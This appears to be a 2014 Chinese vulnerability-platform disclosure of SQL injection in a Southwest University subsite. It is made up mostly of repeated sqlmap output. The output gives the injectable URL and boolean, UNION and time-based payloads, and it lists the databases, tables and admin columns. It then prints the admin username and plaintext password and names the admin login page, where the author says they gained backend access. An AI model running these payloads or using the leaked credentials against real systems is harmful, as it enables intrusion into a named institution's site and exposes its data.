2014-09-30: 细节已通知厂商并且等待厂商处理中 2014-10-05: 厂商已经主动忽略漏洞,细节向公众公开
西南大学某分站存在SQL注入一枚,已进入后台
注入地址:http://logic.swu.edu.cn/zxdt2.php?id=26 (GET)
sqlmap identified the following injection points with a total of 46 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=26 AND 8694=8694 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-6776 UNION ALL SELECT NULL,NULL,CONCAT(0x71616e6d71,0x7872714241786c525062,0x716c7a7471),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=26 AND SLEEP(5)---web server operating system: Windows 2003web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=26 AND 8694=8694 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-6776 UNION ALL SELECT NULL,NULL,CONCAT(0x71616e6d71,0x7872714241786c525062,0x716c7a7471),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=26 AND SLEEP(5)---web server operating system: Windows 2003web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] w_zxxsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=26 AND 8694=8694 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-6776 UNION ALL SELECT NULL,NULL,CONCAT(0x71616e6d71,0x7872714241786c525062,0x716c7a7471),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=26 AND SLEEP(5)---web server operating system: Windows 2003web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0.11Database: w_zxx[33 tables]+-----------------------+| admin || centerdynamic || course || coursetype || degreepaper || en_history_instruct || english_admin || english_centerdynamic || english_contact || english_course || english_coursetype || english_csli_mag || english_img_news || english_majortype || english_member || english_phd_program || english_report || english_student || english_study || english_years_course || his_organ_regu || img_news || major || major_tutor || majortype || member || member_describe || report || stu_type || student || study || tutor || years_course |+-----------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=26 AND 8694=8694 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-6776 UNION ALL SELECT NULL,NULL,CONCAT(0x71616e6d71,0x7872714241786c525062,0x716c7a7471),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=26 AND SLEEP(5)---web server operating system: Windows 2003web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0.11Database: w_zxxTable: admin[3 columns]+----------+-------------+| Column | Type |+----------+-------------+| id | int(11) || password | varchar(30) || username | varchar(30) |+----------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=26 AND 8694=8694 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-6776 UNION ALL SELECT NULL,NULL,CONCAT(0x71616e6d71,0x7872714241786c525062,0x716c7a7471),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=26 AND SLEEP(5)---web server operating system: Windows 2003web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0.11Database: w_zxxTable: admin[1 entry]+----------+----------+| username | password |+----------+----------+| admin | 135790 |+----------+----------+
后台地址:
http://logic.swu.edu.cn/admin_login.php
你比我懂
危害等级:无影响厂商忽略
忽略时间:2014-10-05 15:08
暂无